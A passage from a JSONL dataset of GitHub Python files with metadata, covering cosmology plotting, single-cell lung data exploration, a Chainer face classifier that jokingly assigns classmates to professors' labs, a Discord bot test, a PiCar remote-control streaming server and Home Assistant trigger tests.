plt.ylabel(\"$a$\")\n plt.xlim(-20, 50)\n plt.ylim(-0.1, a_open.max())\n plt.grid()\n plt.savefig(HW_DIR + \"ps2_q1f.eps\")\n", "repo_name": "christianhbye/cosmology", "sub_path": "src/ps2.py", "file_name": "ps2.py", "file_ext": "py", "file_size_in_byte": 2944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.abs", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sinh", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.cosh", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.arccosh", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "1176362415", "text": "import scanpy as sc\nimport os\nimport anndata\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scanpy.metrics.specificity.plot import marker_genes_distribution, one_v_max_genelist\nfrom scanpy.metrics.specificity.analysis import specificity_quality_control\nfrom scanpy import metrics\nfrom pathlib import Path\nimport pickle\nimport seaborn as sns\nfrom collections import Counter\n\n\nROOTDIR = r''\nDATA_PATH = r'data/'\n\ntrav_count = pd.read_csv(DATA_PATH + 'krasnow_hlca_10x_UMIs.csv')\ntrav_meta = pd.read_csv(DATA_PATH + 'krasnow_hlca_10x_metadata.csv')\n\nfull_data_dict_path = {'lukassen_par': 'lukassen20_lung_orig.processed.h5ad', # parenchyma\n 'lukassen_AW': 'lukassen20_airway_orig.processed.h5ad', # bronchi, epithelial\n 'madissoon': 'madissoon19_lung.processed.h5ad',\n 'barbry': 'HCA_Barbry_Grch38_Raw_filter_Norm.h5ad',\n 'vieira_alv': 'vieira19_Alveoli_and_parenchyma_anonymised.processed.h5ad',\n 'vieira_bronch': 'vieira19_Bronchi_anonymised.processed.h5ad',\n 'vieira_nas': 'vieira19_Nasal_anonymised.processed.h5ad',\n 'travigliani': 'facs_normal_lung_blood_scanpy.20200205.RC4.h5ad',\n 'trav2': 'droplet_normal_lung_blood_scanpy.20200205.RC4.h5ad'}\n\n\ndef load_full_data(name):\n return anndata.read_h5ad(DATA_PATH + full_data_dict_path[name])\n\nbarbry = load_full_data('barbry')\nmadissoon = load_full_data('madissoon')\nlukassen_par = load_full_data('lukassen_par')\nlukassen_AW = load_full_data('lukassen_AW')\nvieira_alv = load_full_data('vieira_alv')\nvieira_bronch = load_full_data('vieira_bronch')\nvieira_nas = load_full_data('vieira_nas')\n\ntravigliani = load_full_data('travigliani')\ntrav2 = load_full_data('trav2')\n\n\n\ndef load_obj(name):\n with open(Path(ROOTDIR).joinpath('data').joinpath(f'{name}.pkl'), 'rb') as f:\n return pickle.load(f)\n\nMarkers_Barbry = load_obj('Marker_Genes_HCA')\n\ndatas = [barbry, madissoon, lukassen, vieira_alv, vieira_bronch, vieira_nas]\n\nsummary = pd.DataFrame(columns=('ncells', 'ngenes', 'nCellTypes'), index=('barbry','madisson','lukassen','vieira_alv','vieira_bronch','vieira_nas'))\n\ni = 0\n\nfor data in datas :\n summary.iloc[i, 0] = data.n_obs\n summary.iloc[i, 1] = data.n_vars\n summary.iloc[i, 2] = len(Counter(data.obs['CellType']).keys())\n i += 1\n\n\nvieira_bronch.var[vieira_bronch.var['highly_variable']==True]\nsns.scatterplot(vieira_bronch.obsm['X_umap_hm'][:,0], vieira_bronch.obsm['X_umap_hm'][:,1])\n\nspecificity_quality_control(adata=madissoon,\n marker_genes=Markers_Barbry,\n partition_key='CellType',\n project_dir=r'C:\\Users\\ipmc\\Documents\\Metrics_results\\deprez_markers_vs_datasets\\deprez_vs_madisson',\n plot_umap=True)\n\n\n# Celltypes nomenclature\n\ncelltypes = []\ncelltypes.append(list(barbry.obs['CellType'].cat.categories))\ncelltypes.append(list(madissoon.obs['CellType'].cat.categories))\ncelltypes.append(list(lukassen_par.obs['CellType'].cat.categories))\ncelltypes.append(list(lukassen_AW.obs['CellType'].cat.categories))\ncelltypes.append(list(vieira_alv.obs['CellType'].cat.categories))\ncelltypes.append(list(vieira_bronch.obs['CellType'].cat.categories))\ncelltypes.append(list(vieira_nas.obs['CellType'].cat.categories))\n\nto_save = pd.DataFrame(celltypes,index=['barbry','madissoon','lukassen_par','lukassen_AW','vieira_alv','vieira_bronch','vieira_nas']).transpose()\nto_save.to_csv(DATA_PATH + 'CellTypes_compare.csv')\n\n", "repo_name": "AntoineCollin/Spec_notebooks", "sub_path": "explore_datasets.py", "file_name": "explore_datasets.py", "file_ext": "py", "file_size_in_byte": 3589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "anndata.read_h5ad", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 63, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 68, "usage_type": "call"}, {"api_name": "scanpy.metrics.specificity.analysis.specificity_quality_control", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "33556925373", "text": "import numpy as np\nimport cv2\nimport os\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nimport pandas as pd\n\nfaceCascade = cv2.CascadeClassifier(\"/Users/nishimurataichi/.pyenv/versions/anaconda3-4.1.0/pkgs/opencv3-3.1.0-py35_0/share/OpenCV/haarcascades/haarcascade_frontalface_alt.xml\")\n\n\ndef cut_out_face():\n img_paths = os.listdir('classmates')\n for img_path in img_paths:\n if '.DS_Store' in img_path:\n continue\n # import ipdb; ipdb.set_trace()\n img = cv2.imread('classmates/' + img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face = faceCascade.detectMultiScale(gray, 1.1, 3)\n if len(face) > 0:\n for rect in face:\n x = rect[0]\n y = rect[1]\n width = rect[2]\n height = rect[3]\n dst = img[y:y + height, x:x + width]\n fixed_dst = cv2.resize(dst, (75, 75))\n new_path = 'classmates_face/' + img_path\n cv2.imwrite(new_path, fixed_dst)\n\n\ndef load_classmates():\n img_paths = os.listdir('classmates_face')\n for img_path in img_paths:\n if '.DS_Store' in img_path:\n continue\n img = cv2.imread('classmates_face/' + img_path)\n yield img_path, img\n\n\ndef img2numpy(fixed_dst):\n '''\n この関数,もっと高速に手順を減らすことができそう\n :return: imgからnumpyへ変換して返す\n '''\n img = np.asarray(fixed_dst, dtype=np.int8)\n r_img = []\n g_img = []\n b_img = []\n\n for i in range(75):\n for j in range(75):\n r_img.append(img[i][j][0])\n g_img.append(img[i][j][1])\n b_img.append(img[i][j][2])\n\n all_ary = r_img + g_img + b_img\n all_np = np.array(all_ary, dtype=np.float32).reshape(3, 5625)\n r, g, b = all_np[0], all_np[1], all_np[2]\n rImg = np.asarray(np.float32(r) / 255.0).reshape(75, 75)\n gImg = np.asarray(np.float32(g) / 255.0).reshape(75, 75)\n bImg = np.asarray(np.float32(b) / 255.0).reshape(75, 75)\n\n rgb = np.asarray([rImg, gImg, bImg]).reshape(1, 3, 75, 75)\n\n return rgb\n\n\nclass SimpleAlex(chainer.Chain):\n def __init__(self):\n super(SimpleAlex, self).__init__(\n conv1 = L.Convolution2D(None, 50, 6, stride=3),\n conv2 = L.Convolution2D(None, 75, 3, pad=1),\n fc1 = L.Linear(None, 200),\n fc2 = L.Linear(None, 11)\n\t\t)\n\n def __call__(self, x):\n h = F.max_pooling_2d(F.relu(self.conv1(x)), 3, stride=1)\n h = F.max_pooling_2d(F.relu(self.conv2(h)), 3, stride=1)\n h = F.dropout(F.relu(self.fc1(h)))\n h = self.fc2(h)\n\n return h\n\nprofessors = {\n 0: 'ito',\n 1: 'inamura',\n 2: 'ushiama',\n 3: 'kimu',\n 4: 'takagi',\n 5: 'ueoka',\n 6: 'oshima',\n 7: 'tomotani',\n 8: 'tsuruno',\n 9: 'fuyuno',\n 10: 'fujihara',\n 11: 'tomimatsu'\n}\n\n\n# cut_out_face()\nif __name__ == '__main__':\n image_names = []\n professor_numbers = []\n\n for img_path, img in load_classmates():\n img = img2numpy(img)\n model = SimpleAlex()\n chainer.serializers.load_npz('geijo_result.npz', model)\n y = model(img)\n y = np.argmax(F.softmax(y).data)\n\n print(y)\n\n image_names.append(img_path)\n professor_numbers.append(professors[y])\n\n all_data = [image_names, professor_numbers]\n\n result = pd.DataFrame(all_data)\n result = result.T\n result.columns = ['学生名', '研究室名']\n result.to_csv('your_fate.csv', index=False)\n\n\n\n\n\n\n\n", "repo_name": "awkrail/GeijoChainer", "sub_path": "predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 3597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 9, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 30, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 65, "usage_type": "call"}, {"api_name": "chainer.Chain", "line_number": 70, "usage_type": "attribute"}, {"api_name": "chainer.links.Convolution2D", "line_number": 73, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 73, "usage_type": "name"}, {"api_name": "chainer.links.Convolution2D", "line_number": 74, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 74, "usage_type": "name"}, {"api_name": "chainer.links.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 75, "usage_type": "name"}, {"api_name": "chainer.links.Linear", "line_number": 76, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 76, "usage_type": "name"}, {"api_name": "chainer.functions.max_pooling_2d", "line_number": 80, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 80, "usage_type": "name"}, {"api_name": "chainer.functions.relu", "line_number": 80, "usage_type": "call"}, {"api_name": "chainer.functions.max_pooling_2d", "line_number": 81, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 81, "usage_type": "name"}, {"api_name": "chainer.functions.relu", "line_number": 81, "usage_type": "call"}, {"api_name": "chainer.functions.dropout", "line_number": 82, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 82, "usage_type": "name"}, {"api_name": "chainer.functions.relu", "line_number": 82, "usage_type": "call"}, {"api_name": "chainer.serializers.load_npz", "line_number": 111, "usage_type": "call"}, {"api_name": "chainer.serializers", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 113, "usage_type": "call"}, {"api_name": "chainer.functions.softmax", "line_number": 113, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 113, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "9807770883", "text": "import pytest\nfrom unittest.mock import AsyncMock, MagicMock, call\nfrom discord_ritoman.bot.bot import bot\nfrom discord_ritoman.bot.bot_command import GLOBAL_COMMAND_TABLE, bot_command\nfrom discord_ritoman.utils import create_logger\n\nlogger = create_logger(__file__)\n\n\n@pytest.mark.asyncio\nasync def test_bot_command_decorator():\n \"\"\"\n tests that the bot command decorator works correctly\n \"\"\"\n mock_logger = MagicMock()\n\n @bot_command(\"mycommand\")\n class MyBotCommand:\n @staticmethod\n async def default(ctx, *args, **kwargs):\n mock_logger(\"default\")\n await ctx.send(\"yes\")\n\n @staticmethod\n async def option_one(ctx, *args, **kwargs):\n mock_logger(\"option one\")\n\n count = 0\n for command in bot.commands:\n if command.name in GLOBAL_COMMAND_TABLE:\n count += 1\n\n assert count == len(GLOBAL_COMMAND_TABLE.items()) > 0\n assert \"testcommand\" in GLOBAL_COMMAND_TABLE\n assert \"mycommand\" in GLOBAL_COMMAND_TABLE\n assert \"testcommand\" in bot.all_commands\n assert \"mycommand\" in bot.all_commands\n assert \"denounce\" in bot.all_commands\n\n await MyBotCommand(AsyncMock(), \"one\", \"four\", 3)\n await MyBotCommand(AsyncMock())\n\n mock_logger.assert_has_calls(\n [call(\"default\"), call(\"option one\")], any_order=True\n )\n\n\ndef test_help_string_contained():\n \"\"\"\"\"\"\n assert bot.all_commands[\"testcommand\"].help == \"this is a testing command\"\n", "repo_name": "stephend017/discord_ritoman", "sub_path": "tests/test_bot/test_bot_command_decorator.py", "file_name": "test_bot_command_decorator.py", "file_ext": "py", "file_size_in_byte": 1466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "discord_ritoman.utils.create_logger", "line_number": 7, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 15, "usage_type": "call"}, {"api_name": "discord_ritoman.bot.bot_command.bot_command", "line_number": 17, "usage_type": "call"}, {"api_name": "discord_ritoman.bot.bot.bot.commands", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 29, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 30, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE.items", "line_number": 33, "usage_type": "call"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 33, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 34, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot_command.GLOBAL_COMMAND_TABLE", "line_number": 35, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 36, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 36, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 37, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 37, "usage_type": "name"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 38, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.mock.AsyncMock", "line_number": 40, "usage_type": "call"}, {"api_name": "unittest.mock.AsyncMock", "line_number": 41, "usage_type": "call"}, {"api_name": "unittest.mock.call", "line_number": 44, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot.all_commands", "line_number": 50, "usage_type": "attribute"}, {"api_name": "discord_ritoman.bot.bot.bot", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "20902471439", "text": "#!/usr/bin/python\nimport socket\nimport zmq\nimport time\nfrom threading import Thread\nimport cv2\nimport base64\n\ntry:\n from picar import PiCar\nexcept:\n print(\"No Picar did not load\")\n\nclientaddr = '192.168.1.151'\nclientaddr = '192.168.1.156'\nclientaddr = '192.168.0.146'\nclientaddr = '192.168.0.169'\n\n#TODO: include some basic safety protocols to ensure car doesn't crash\n\nclass Reciever(Thread):\n def __init__(self, addr=\"\", port = 5000):\n Thread.__init__(self, daemon=True)\n\n self.size = 1024\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #???\n sock.bind((addr,port))\n sock.listen(5) \n self.client,self.address = sock.accept()\n print(\"New client\")\n self.cmd = None\n self.start()\n\n def recv_cmd(self):\n self.cmd = self.client.recv(self.size).rstrip().decode()\n return cmd\n\n def read(self):\n cmd = self.cmd\n self.cmd = None\n return cmd\n\n def run(self):\n while True:\n self.cmd = self.client.recv(self.size).rstrip().decode()\n \n\n\nclass FootageStream(Thread):\n '''Continuously serves requests for the latest frame'''\n \n def __init__(self, camera,addr,port=5555):\n print(\"initializing live stream\")\n Thread.__init__(self)\n self.camera = camera\n context = zmq.Context()\n self.sock = context.socket(zmq.PUB)\n self.sock.connect('tcp://{}:{}'.format(addr[0],port)) #??? why not bind\n \n print(\"starting thread\")\n self._running = False\n self.start()\n\n def run(self):\n '''Send images to the connected socket'''\n self._running = True\n while(self._running):\n #TODO: adjust this to match the picamera commands\n ret,image = self.camera.read()\n #image = cv2.resize(frame, (640,480))\n \n #if self.mode == 'opencv':\n # pass #TODO: impliment open cv modes\n \n # send image to client\n encoded, buffer = cv2.imencode('.jpg', image)\n jpg_as_text = base64.b64encode(buffer)\n #TODO: send as a numpy array\n self.sock.send(jpg_as_text)\n \n # Runs after close\n self.sock.shutdown()\n self.sock.close()\n\n def close(self):\n self._running=False\n \n \ndef main():\n '''Start the picar and wait for commands'''\n print(\"Initializing reciever\")\n reciever = Reciever()\n print(\"Initializing car\")\n with PiCar() as car:\n stream = FootageStream(camera=car.camera,addr = reciever.address)\n while True: #TODO: detect when socket is broken properly\n #print(\"command?\")\n cmd = reciever.read()\n\n '''\n # Safety stop\n dist = car.sonar.ping()\n if car._mode:\n if dist<.2:\n car._mode = None\n car._stopped = True\n car.ebrake()\n cmd = None\n\n '''\n \n # Override commands here\n if cmd == \"all_stop\":\n car.all_stop()\n car._mode=None\n\n if cmd ==\"follow_line\":\n if car._mode=='follow_line':\n car._mode=None\n car.all_stop()\n else:\n car._mode = 'follow_line'\n follow = car.follow_line(darkLine=False,\n speed=1,\n gain=(10,60,0),\n nHist = 100,\n runTime = 1,\n coastTime = .5,\n maxAng = 30\n )\n\n \n # Continue running current mode\n if car._mode == None:\n car.run_cmd(cmd)\n elif car._mode == 'follow_line':\n try:\n next(follow)\n except:\n print(\"Couldnt follow line\")\n car._mode=None\n elif car._mode == 'track_object':\n pass\n else:\n pass\n \n\n stream.close()\n car.all_stop()\n\n\nif __name__==\"__main__\":\n main()\n \n", "repo_name": "jimingkang/adeept_picar-bv2.0", "sub_path": "192_168_0_172/v3/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "threading.Thread", "line_number": 21, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 23, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 23, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 27, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 27, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 27, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 28, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 28, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 51, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 56, "usage_type": "name"}, {"api_name": "zmq.Context", "line_number": 58, "usage_type": "call"}, {"api_name": "zmq.PUB", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 78, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 79, "usage_type": "call"}, {"api_name": "picar.PiCar", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "37582838640", "text": "\"\"\"The tests for Media player device triggers.\"\"\"\nimport pytest\n\nimport homeassistant.components.automation as automation\nfrom homeassistant.components.media_player import DOMAIN\nfrom homeassistant.const import (\n STATE_IDLE,\n STATE_OFF,\n STATE_ON,\n STATE_PAUSED,\n STATE_PLAYING,\n)\nfrom homeassistant.helpers import device_registry\nfrom homeassistant.setup import async_setup_component\n\nfrom tests.common import (\n MockConfigEntry,\n assert_lists_same,\n async_get_device_automations,\n async_mock_service,\n mock_device_registry,\n mock_registry,\n)\nfrom tests.components.blueprint.conftest import stub_blueprint_populate # noqa\n\n\n@pytest.fixture\ndef device_reg(hass):\n \"\"\"Return an empty, loaded, registry.\"\"\"\n return mock_device_registry(hass)\n\n\n@pytest.fixture\ndef entity_reg(hass):\n \"\"\"Return an empty, loaded, registry.\"\"\"\n return mock_registry(hass)\n\n\n@pytest.fixture\ndef calls(hass):\n \"\"\"Track calls to a mock service.\"\"\"\n return async_mock_service(hass, \"test\", \"automation\")\n\n\nasync def test_get_triggers(hass, device_reg, entity_reg):\n \"\"\"Test we get the expected triggers from a media player.\"\"\"\n config_entry = MockConfigEntry(domain=\"test\", data={})\n config_entry.add_to_hass(hass)\n device_entry = device_reg.async_get_or_create(\n config_entry_id=config_entry.entry_id,\n connections={(device_registry.CONNECTION_NETWORK_MAC, \"12:34:56:AB:CD:EF\")},\n )\n entity_reg.async_get_or_create(DOMAIN, \"test\", \"5678\", device_id=device_entry.id)\n\n trigger_types = {\"turned_on\", \"turned_off\", \"idle\", \"paused\", \"playing\"}\n expected_triggers = [\n {\n \"platform\": \"device\",\n \"domain\": DOMAIN,\n \"type\": trigger,\n \"device_id\": device_entry.id,\n \"entity_id\": f\"{DOMAIN}.test_5678\",\n }\n for trigger in trigger_types\n ]\n triggers = await async_get_device_automations(hass, \"trigger\", device_entry.id)\n assert_lists_same(triggers, expected_triggers)\n\n\nasync def test_if_fires_on_state_change(hass, calls):\n \"\"\"Test triggers firing.\"\"\"\n hass.states.async_set(\"media_player.entity\", STATE_OFF)\n\n data_template = (\n \"{label} - {{{{ trigger.platform}}}} - \"\n \"{{{{ trigger.entity_id}}}} - {{{{ trigger.from_state.state}}}} - \"\n \"{{{{ trigger.to_state.state}}}} - {{{{ trigger.for }}}}\"\n )\n trigger_types = {\"turned_on\", \"turned_off\", \"idle\", \"paused\", \"playing\"}\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\n \"platform\": \"device\",\n \"domain\": DOMAIN,\n \"device_id\": \"\",\n \"entity_id\": \"media_player.entity\",\n \"type\": trigger,\n },\n \"action\": {\n \"service\": \"test.automation\",\n \"data_template\": {\"some\": data_template.format(label=trigger)},\n },\n }\n for trigger in trigger_types\n ]\n },\n )\n\n # Fake that the entity is turning on.\n hass.states.async_set(\"media_player.entity\", STATE_ON)\n await hass.async_block_till_done()\n assert len(calls) == 1\n assert (\n calls[0].data[\"some\"]\n == \"turned_on - device - media_player.entity - off - on - None\"\n )\n\n # Fake that the entity is turning off.\n hass.states.async_set(\"media_player.entity\", STATE_OFF)\n await hass.async_block_till_done()\n assert len(calls) == 2\n assert (\n calls[1].data[\"some\"]\n == \"turned_off - device - media_player.entity - on - off - None\"\n )\n\n # Fake that the entity becomes idle.\n hass.states.async_set(\"media_player.entity\", STATE_IDLE)\n await hass.async_block_till_done()\n assert len(calls) == 3\n assert (\n calls[2].data[\"some\"]\n == \"idle - device - media_player.entity - off - idle - None\"\n )\n\n # Fake that the entity starts playing.\n hass.states.async_set(\"media_player.entity\", STATE_PLAYING)\n await hass.async_block_till_done()\n assert len(calls) == 4\n assert (\n calls[3].data[\"some\"]\n == \"playing - device - media_player.entity - idle - playing - None\"\n )\n\n # Fake that the entity is paused.\n hass.states.async_set(\"media_player.entity\", STATE_PAUSED)\n await hass.async_block_till_done()\n assert len(calls) == 5\n assert (\n calls[4].data[\"some\"]\n == \"paused - device - media_player.entity - playing - paused - None\"\n )\n", "repo_name": "fpetillo/home-assistant", "sub_path": "tests/components/media_player/test_device_trigger.py", "file_name": "test_device_trigger.py", "file_ext": "py", "file_size_in_byte": 4637, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tests.common.mock_device_registry", "line_number": 30, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tests.common.mock_registry", "line_number": 36, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tests.common.async_mock_service", "line_number": 42, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tests.common.MockConfigEntry", "line_number": 47, "usage_type": "call"}, {"api_name": "homeassistant.helpers.device_registry.CONNECTION_NETWORK_MAC", "line_number": 51, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.device_registry", "line_number": 51, "usage_type": "name"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 53, "usage_type": "argument"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 59, "usage_type": "name"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 62, "usage_type": "name"}, {"api_name": "tests.common.async_get_device_automations", "line_number": 66, "usage_type": "call"}, {"api_name": "tests.common.assert_lists_same", "line_number": 67, "usage_type": "call"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 72, "usage_type": "argument"}, {"api_name": "homeassistant.setup.async_setup_component", "line_number": 81, "usage_type": "call"}, {"api_name": "homeassistant.components.automation.DOMAIN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "homeassistant.components.automation", "line_number": 83, "usage_type": "name"}, {"api_name": "homeassistant.components.automation.DOMAIN", "line_number": 85, "usage_type": "attribute"}, {"api_name": "homeassistant.components.automation", "line_number": 85, "usage_type": "name"}, {"api_name": "homeassistant.components.media_player.DOMAIN", "line_number": 89, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 105, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 114, "usage_type": "argument"}, {"api_name": 